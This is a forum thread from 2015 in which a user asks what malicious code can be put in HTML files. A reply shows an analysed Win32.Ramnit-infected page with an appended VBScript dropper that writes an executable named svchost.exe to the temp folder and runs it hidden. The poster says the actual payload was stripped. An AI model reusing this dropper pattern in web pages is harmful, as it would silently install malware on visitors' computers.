Author Topic: HTML Malicious code?  (Read 1202 times)

0 Members and 1 Guest are viewing this topic.

Offline Zman0x0

  • NULL
  • Posts: 3
  • Cookies: -2
    • View Profile
HTML Malicious code?
« on: October 13, 2015, 04:53:31 am »
Hey boys and girls i know HTML how to make websites and do other fun things with it, but the thing is there malcious code i can put into .htm files and or site?

Offline 0E 800

  • Not a VIP
  • VIP
  • Baron
  • *
  • Posts: 895
  • Cookies: 131
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
    • View Profile
Re: HTML Malicious code?
« Reply #1 on: October 13, 2015, 05:15:22 am »
The invariable mark of wisdom is to see the miraculous in the common.

Offline Trevor

  • Serf
  • *
  • Posts: 39
  • Cookies: 18
  • Coder, Reverser
    • View Profile
Re: HTML Malicious code?
« Reply #2 on: October 13, 2015, 07:09:43 am »
You can try analysing the Win32.Ramnit malware.
It infects html files by appending malicious code at the end.

Here is an example from one sample which I analyzed. I have purposely removed the malicious payload which was  in WriteData.

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.nosteam.ro">
<style type="text/css">

body
{
background-color:#000000;
}
/*]]>*/
</style>
<title>NoSteam.RO</title>


</head>
<body>

</body>
</html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--©ïnUGzVhYûÔ¼ÁVP®7nê Œ•grŸ— s´
/OE*Rœ™óÑð¥®CˆÉÓrIÁQo6æ̹lŠÊ,LßX¦ãöµ'Ö53Ê´<ƒ2@ø4‰¹g
«ŒpQ­*Eùqâmw‰1ûÅå•qJ-qý ŠM¯CA‡Þ HžcU°òØ[ZZ8Ò'›¤$¼ÐÏ#Z ¦nyûtM¼y_d°Ü!mxgÑ7+r@¬" š'äE¦¿8yimMëĶÁ$‰#ð^!ɱè$Œk»¾_ǁ´'
&D!þ½ÖŽÈ·òü·ýMCŒ¯° £% N i݃ѳiëi”dá3Q‹Ùï¡›eñbGw•˜¯ÂpÕ[ú¤qƯb´•Îï¼´ì}çYÝ3*¨—ÑŠ³²\IÛPXlŠiñ €}Iú¼µOx5m!;ø‹
`¿âéËiB«Ü¾€»"DûÛ£~°ã“p4‰j—@«;™–þCG<+³ñƒ
64®âckÄ 
pLM[)öá‹Ù;; ñêR2ñûñêñêñêØ¢L¾ŠRQýê ñê-->